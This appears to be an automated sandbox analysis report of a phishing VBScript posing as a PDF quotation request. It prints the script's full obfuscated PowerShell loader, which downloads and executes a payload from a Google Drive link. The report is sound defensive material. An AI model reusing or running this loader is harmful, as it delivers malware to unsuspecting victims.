Analysis

  • max time kernel
    299s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    18-11-2024 10:03

General

  • Target

    Fluor RFQ1475·pdf.vbs

  • Size

    15KB

  • MD5

    695ec6cd0d4d8abaab5bed4e4f37153d

  • SHA1

    027b2b36b69e9f41bc5b54493533d8b417192255

  • SHA256

    3bb02f08d2d70b6f126d045a385a241330dbe96689304c48f1b9a1958297a060

  • SHA512

    36a68f1693a03903990cf86eafe285cacab31b8b89a2a7c033e06545942604d8c735f4ff4d15d33c77e83379d74064954cd12a5fcb1bc3ea2b6cc289ef63ae1c

  • SSDEEP

    384:aCTCJn/NHU8wde1pmZaKHQtL1YNBcYK7CB7qdgcKU:JuJnFH/w6pmmtl5WB7qm8

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fluor RFQ1475·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2524
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Estivate Electrochronographic Kldet denationaliseringernes Decanting Sstridskrfters #><#Hundjvel Ubeslutsomstes Skvhovedet Sammenligningerne Indstuderingens #>$Bebyrdelsen='Undervisningsbruget';function Koffardifart($Enqueter100){If ($host.DebuggerEnabled) {$Rhamnal=4} for ($Fichu=$Rhamnal;;$Fichu+=5){if(!$Enqueter100[$Fichu]) { break }$Chaetosomatidae+=$Enqueter100[$Fichu]}$Chaetosomatidae}function Poppied($Platanista147){ .($hjertesorg) ($Platanista147)}$Elskoven=Koffardifart 'Thaun FeoE ,ertD la.UnleWRoboEJenfB.alecBe al GecINskeE ilfnKa at';$Ndtvungne=Koffardifart ' BorMFriso .ekzUd,aiK.ntlNonplmacra Tan/';$firemandswhistens=Koffardifart 'Sca TMyxolJossssu p1Gal 2';$frugtstand='Tera[ PilnBraneRe eT ver.VrinSF,adEInfoRUnmevInc.iOpslcUnaceB,rtp dgao ufiI KjeNPosttSa tmbylda Unvn,deiAPlatGTeleeD cyrCrts]Fejd:Hyme: barS Be EDownCmonsuMonyr Seei scaTAll yKrydpChooRDomiosvvetSka OTydeCPurpoForbLCant=Perf$ BarfIpabI droRvarieOxheMFa.raFrkhN ystdspigSErotwSkulHUnboISeeaSMolrT eucEpaafN tr.s';$Ndtvungne+=Koffardifart 'Poe,5genn.Data0Imp Uncl(UdklWAppriE hvnFrp dGearo pirwOxalsVulk sl.tNFishTMa n Trop1Kim 0S ud.Teos0over;.onp KoreWRepoiFeo nAngl6Pavi4sche; re. No oxSylt6Rvrd4 G.r; and G derTermv la:Mund1 Mar3A ri1Forb.unco0,ret)Trgh BedsGOpvie LemcMiddkDa aoFacs/,jov2Gosc0Reas1Hamp0,sym0Sk b1 Act0Subs1 Ich I faFA riiNon rSucce R sfSquuo A hxU.vo/Mass1m,ch3R.bb1Free. Tar0';$Oligoprothetic=Koffardifart 'RameU Jo s LifECom RThil- Wala ortgPrineMa.tnmumbt';$Valsede=Koffardifart 'Mangh afrtFl atAktip PedsLin :Mcen/Katu/Pl nd msarJuleiThe,vCirceBur .AmangIrraoUnd oP.otgenerlSkifeFord.MetacDiffo esmKamm/Folku.irtcCru ?App e.krmxKiddpUn,eo m nrAfbitProa= tatd TwioCorpwHortn RumlN rvoFaldaEk odRis &Eye iRevadUdry= .yg1E brgmonsxProb2 He EAssuzH mm0Valgd AnaXKar.C irc3H ndz f rOP.ee3Pels4Clem2Sm t-BlyaR Un x BrakSkinEAitsc al4Gol,d Do,-EcocMOverHDdssYSeptA.schkReim-TrespErhvE';$tttekammen=Koffardifart 'Hibe>';$hjertesorg=Koffardifart 'OveriNat,e Immx';$Redirigeringers='Risskov';$Tilbagekaldelsesordningen='\Houting.Gha';Poppied (Koffardifart ' id$Be tg P.pLS,bsoKor.bBlaaATenelProd: .nfS,anct,oolORettFDegeMsoapN RenGForeDSpeceFastsComm=R ta$NarceSaddNPrisVfrdi:E,hia Pr P TycPEskoD PatAReditKursAVan,+ Aha$ sk tSk biSu sl SkrbApana mrG naeDa.sk uraFi sLLaveDNeurECanclSkotS ondEBa dSPar OdeteRVegeDAcann ModI.aminHalfg TaoeNo mN');Poppied (Koffardifart ' sse$AlpeG Sk LLnenOAn mBOposa HonLLn t:PencodefiVSammeG,eaRSupebAyelYErhvGT mbnU exI utNForbGUlve=Obse$wareV Fl a enlEnr S epELuxedCon ERef..TelesGeompMozalUncoiSpejtFetu( Nar$Teo,t weat xtTBij eIdeak Sa aUns MMetoMSte ESkrinSttt)');Poppied (Koffardifart $frugtstand);$Valsede=$overbygning[0];$Brontosaur=(Koffardifart ' Lod$Skr g PolL ungODisaBPhota,joeLKlu :.vanBSte ROverE SunM Ko e feslT rpYSad =MellNZoneeGr.lWTilb-Ko tOFr lbmaskJHypoeNarccPattt Bag nseSbuchy,ubpsKazaTSemiE,cytMUnsp.E bl$StoreLay,lSydsSMar.K OutoPsalVbi.eet.lgn');Poppied ($Brontosaur);Poppied (Koffardifart 'Nive$KrypBRep,r cateTilsmDealeU velAlkyySt m.St,rHPrede O ea entdClaueBootrhac.s Dis[Ro,a$FrisOsa tl freiJe ngD,lioSpndp unerEndaoStettEr.ch S aeCu etWieni OricStal]Unde=Occi$receN rnd memtBeslvT avuS ojnlabig DamnForee');$Rubiginose=Koffardifart 'Triv$Ka mBPa er PaneKommm GrueI del ,ney eur.StraDAlkaoFremwH.linSi pl tao Bygaud,bd derFNontiUautlHaggeSste(Opve$BoolVVildaF sslEnnosP ile,ogodLogae Un.,Af.a$FuliAMahdmDalep CarhN.rdi .hig .quaProfm Disa StreOpa )';$Amphigamae=$Stofmngdes;Poppied (Koffardifart ' Sta$Sun gC deLsounOpauebOsteaKaftL Tan:s,yrbPrveuGamiTPhenIMaskkBezaSUbefSAmniT MonrGe tUVenikRecuTPlanUSpinRNo.b=Indl(Abnot ette ResSWl dt Kat- ConPBakkaLayeTTam HOps Rddi$ ArtAkonomH reP SkuH rdeIA,tigSupeAazalMHoglAGauceTrkk)');while (!$Butiksstruktur) {Poppied (Koffardifart 'Kall$ izzgt wblIndsoBi dbIndta DomlDobb:SlumS,mtalbackaOpstgFutut SpeeNivekMetrvAcutgUnca=G,ft$PleaMBefoyArguoPapinUncueMakauBasers mioDisomPalaa') ;Poppied $Rubiginose;Poppied (Koffardifart 'Trsts,kdetBayoASludr PartOutw-DiffsTot L BaleHemoe,krip B o Stor4');Poppied (Koffardifart ' Ind$ KobGDennLdesuocompBShoca Krol Un.:T rrbTreauTricT G.nIAer k ,yoSM lisDe at palrCrosuBaankunlotDisrUGarvr Tr =Slip( PretOvereAmniSas etSkri-U biPMenuaEkspTSerbHur t Aut$ AkkANomeMGuttpRetuhAdamiCompgvatiA mpaMAteiaEtouEAneu)') ;Poppied (Koffardifart 'Nemo$OvergKautLStroO LanB enta eziL Cha:G spSIndePRanuIarveRReariVisstRefoe Ki d UdflfljtyRask=Quat$AuragEquiLO riO LvsbBesyA cholPest:Ta gP SelIF emLH,rmT Para Na SSloyTTakte ukaRUndeS Ech+Afid+ Thu%Lok $SammO revOficEAislRSculBOmvey ForG RhaNA.toIUnocNHorsgse,v.AumeC Hi oAnt U asyNLe pT') ;$Valsede=$overbygning[$Spiritedly]}$Adventistens=301189;$Abetment=30028;Poppied (Koffardifart 'Omba$ Klag BruL fesobumbB Hyracar.L N n:Arr KSalvnFlytkByggBpresRAutod Ta eMollN.kolE Kr ept=Ekst Sli,GHel.E nteTToym-In,ocHemooK rlnConst irceVveiN omaTSur dea$Aft AIndlMHn ePfrimh mbriBotoG Co.A DaaMFly aPeasE');Poppied (Koffardifart 'Rr r$DogsgCy.llKr eoBranbPa.ma anlStap:MaryH UbeoemblfRandjFemog irae .aarBrndmKanaeTillsBatttExcerNedneEnvinAkseeBe a Foo= tje For[,sonSOlanyLudbs rictH skeg ycm For.PeebCBeslo S mnMatevR,toe SkurTegnt,ene] lar:Hjer: GniFReforAggeoDivimO,hrBBillaDe esTo veSila6Scle4FestSkejst linrI,pei IntnMu tgSt l( Unr$SwigKKrosnNo.skCatabR skr WhidTe re DivnRivee Gen)');Poppied (Koffardifart 'Tec $tolvgEnjelUpdroIntubWeatAS lll Un,: SabeFriglPr dV KeraEnnuN DagiWheet RreIPresCEven Eme=Orib Micr[ entSSav YdjvlSGregTFuldeThe MAgno.Te et LaneProcXCigaT Ph .Tetae MisnNsebCMe aofor DAnt.IskrmNRumfGNon ]Reng: Bam:.nphAP.roS Fa cAfteidiphi Sik. GolgPrene fr TRadiS ermTBdeprElitIKomfnSaksGBer ( us$Opp.h onsoRoguFBetwJS,orGBundeAfteRSl gm CuleKlipsbillT,terr SkaEBluenforme t i)');Poppied (Koffardifart 'B id$Va.aG BegLStilOPropB,uria DanLMagi:Lo sz illYstorgAfgaOUdfrdOejeaMortcSwirtunamY FleLTubii Res=U se$,rade arelUndev.redaHas.NFolkIEuorT kroiSpikCKvar.Pr.aSGeleu tomb ofeS ,poTJonsr ulI H pn yldGRo,b(Cyma$Mae ASandd,usaVgushEMellN aaht Enci TokS peT,oleE yggn Su s Bed,koda$ ,umAUnwhbcente Bilt .nbmAmirEDiskNSym THasp)');Poppied $zygodactyli;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2556

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Cab9D3B.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • memory/2556-20-0x000007FEF578E000-0x000007FEF578F000-memory.dmp

    Filesize

    4KB

  • memory/2556-21-0x000000001B620000-0x000000001B902000-memory.dmp

    Filesize

    2.9MB

  • memory/2556-22-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2556-24-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2556-23-0x0000000001F10000-0x0000000001F18000-memory.dmp

    Filesize

    32KB

  • memory/2556-25-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2556-26-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2556-27-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2556-28-0x000007FEF578E000-0x000007FEF578F000-memory.dmp

    Filesize

    4KB

  • memory/2556-29-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2556-30-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2556-31-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2556-32-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB